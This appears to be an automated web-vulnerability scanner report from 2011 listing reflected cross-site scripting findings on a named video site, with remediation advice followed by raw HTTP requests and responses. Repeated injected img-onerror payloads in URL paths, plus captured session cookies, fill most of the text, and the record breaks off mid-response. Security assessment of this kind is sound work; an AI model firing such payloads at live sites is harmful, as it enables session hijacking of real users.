Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 was submitted in the REST URL parameter 4. This input was echoed as f4b0c<img src=a onerror=alert(1)>88040cf1d82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuref4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:50 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 57783
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref4b0c<img src=a onerror=alert(1)>88040cf1d82"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e was submitted in the REST URL parameter 4. This input was echoed as 9d235"><img src=a onerror=alert(1)>9e252f7871e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=59
Content-Length: 57827
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure9d235"><img src=a onerror=alert(1)>9e252f7871e/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34 was submitted in the REST URL parameter 4. This input was echoed as 71e6c"><img src=a onerror=alert(1)>96f11e9dd34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 77754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure71e6c"><img src=a onerror=alert(1)>96f11e9dd34/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22 was submitted in the REST URL parameter 4. This input was echoed as 8fa41<img src=a onerror=alert(1)>55c9c937f22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=65
Content-Length: 77710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure8fa41<img src=a onerror=alert(1)>55c9c937f22"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfc58'%3bc01f25840e4 was submitted in the REST URL parameter 6. This input was echoed as cfc58';c01f25840e4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBEcfc58'%3bc01f25840e4 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:26 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=72
Content-Length: 94329
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc was submitted in the REST URL parameter 4. This input was echoed as fbdf3"><img src=a onerror=alert(1)>42b09b361cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurefbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:16 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=43
Content-Length: 76768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventurefbdf3"><img src=a onerror=alert(1)>42b09b361cc/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a was submitted in the REST URL parameter 4. This input was echoed as f8f48<img src=a onerror=alert(1)>a3fbcd0230a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuref8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=20
Content-Length: 76724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref8f48<img src=a onerror=alert(1)>a3fbcd0230a"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22732'%3b900f2443f83 was submitted in the REST URL parameter 6. This input was echoed as 22732';900f2443f83 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v189741093prNNZM522732'%3b900f2443f83 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:44 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb was submitted in the REST URL parameter 4. This input was echoed as bef9b"><img src=a onerror=alert(1)>63733810adb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurebef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventurebef9b"><img src=a onerror=alert(1)>63733810adb/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9 was submitted in the REST URL parameter 4. This input was echoed as be275<img src=a onerror=alert(1)>e6d8963fd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurebe275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 76397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurebe275<img src=a onerror=alert(1)>e6d8963fd9"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6a1e'%3b1b1f85b69a1 was submitted in the REST URL parameter 6. This input was echoed as c6a1e';1b1f85b69a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8c6a1e'%3b1b1f85b69a1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=9
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0 was submitted in the REST URL parameter 4. This input was echoed as 5ce45"><img src=a onerror=alert(1)>b926a16b5e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=9F8A0036-A353-DB95-6D07-AA38C789D992&LastUpdate=03/Feb/2011:12:31:41 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:41 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=16
Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure5ce45"><img src=a onerror=alert(1)>b926a16b5e0/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41 was submitted in the REST URL parameter 4. This input was echoed as 2e455<img src=a onerror=alert(1)>cd67645eb41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:55 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:56 GMT
Connection: close
